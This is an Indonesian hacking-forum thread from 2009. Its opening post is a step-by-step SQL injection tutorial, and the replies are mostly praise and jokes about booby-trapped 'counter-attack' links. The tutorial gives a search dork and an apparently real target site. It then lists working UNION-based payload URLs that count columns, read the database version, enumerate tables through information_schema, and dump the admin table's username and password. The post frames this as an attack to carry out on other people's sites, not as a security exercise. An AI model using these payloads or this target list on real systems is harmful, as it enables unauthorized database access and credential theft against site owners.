Page 1 of 9

[TUTORIAL] SQL Injection Pada PHP

Posted: Fri Jun 12, 2009 10:29 pm
by ji_bog
Untuk pertama kalinya gw mau memberanikan diri untuk posting tentang SQL Injection, soal nya gw juga masih belajar dalam hal ini :lol: kalo kiranya gw salah tolong di koreksi dan yang udah master jangan baca postingan ini ini cuma buat newbie kaya gw :cry: :cry:

DORK

Code: Select all

inurl:news_detail.php?id=
Contoh target

Code: Select all

http://www.lbpl.in/news_detail.php?id=14
masukian tanda petik (')
kurang lebih seperti di bawah ini

Code: Select all

http://www.lbpl.in/news_detail.php?id=14'
lalu muncul error seperti

Code: Select all

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan :lol:
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh

Code: Select all

http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010-- 
order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 :lol: coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah

Code: Select all

http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4-- 
setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2
setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini

Code: Select all

http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--
setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG
ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi :P
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini

Code: Select all

http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti

Code: Select all

http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e-- 
setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir :D ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya.... :lol: :lol: :lol: :lol: :lol:

Code: Select all

http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--
nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin

Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Sat Jun 13, 2009 10:43 am
by bernadsatriani
nice bro..
lebih baek berbagi dari pada meminta :D

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Sun Jun 14, 2009 3:33 pm
by Bi4kKob4r
perhatian aja...
hati2 dalam mencoba

soalnya banyak yang bikin serangan balik

contohnya

harap berdoa sebelum klik :lol:

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Sun Jun 14, 2009 7:01 pm
by arkaeno
ati2 dengan posting di atas saya........ jangan di klik linknya................

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Mon Jun 15, 2009 5:07 pm
by aries deris
Bi4kKob4r wrote:perhatian aja...
hati2 dalam mencoba

soalnya banyak yang bikin serangan balik

contohnya

harap berdoa sebelum klik :lol:
wkwkwkwkwk scriptnya Xshadow
wkwkwkwkwwk
iya tuh isa buat nyerang balik wkwkwkwkwkwkwk

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Mon Jun 15, 2009 6:00 pm
by wiLMaR_kiDz
hahaa...nice post...
eitt,tp bner jg tu...ati2 srangan blik bos..... ;) ;)

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Mon Jun 15, 2009 9:06 pm
by N4ck0
whh serangan baliknya bagus tuh
scriptnya susah banget om

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Wed Jun 17, 2009 11:25 am
by 4d1tz
wakakakak.. kena serangan balik.. euy :D
bercandanya ngeri kk :mrgreen:

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Wed Jun 17, 2009 1:18 pm
by bernadsatriani
wah pada ngapa nih

Re: [TUTORIAL]SQL Injection Pada PHP

Posted: Thu Jun 18, 2009 1:03 pm
by Agoes_doubleb
Dah banyak tutor SQLi.... yang masih bingun nyari keterlaluan.... :lol: :lol: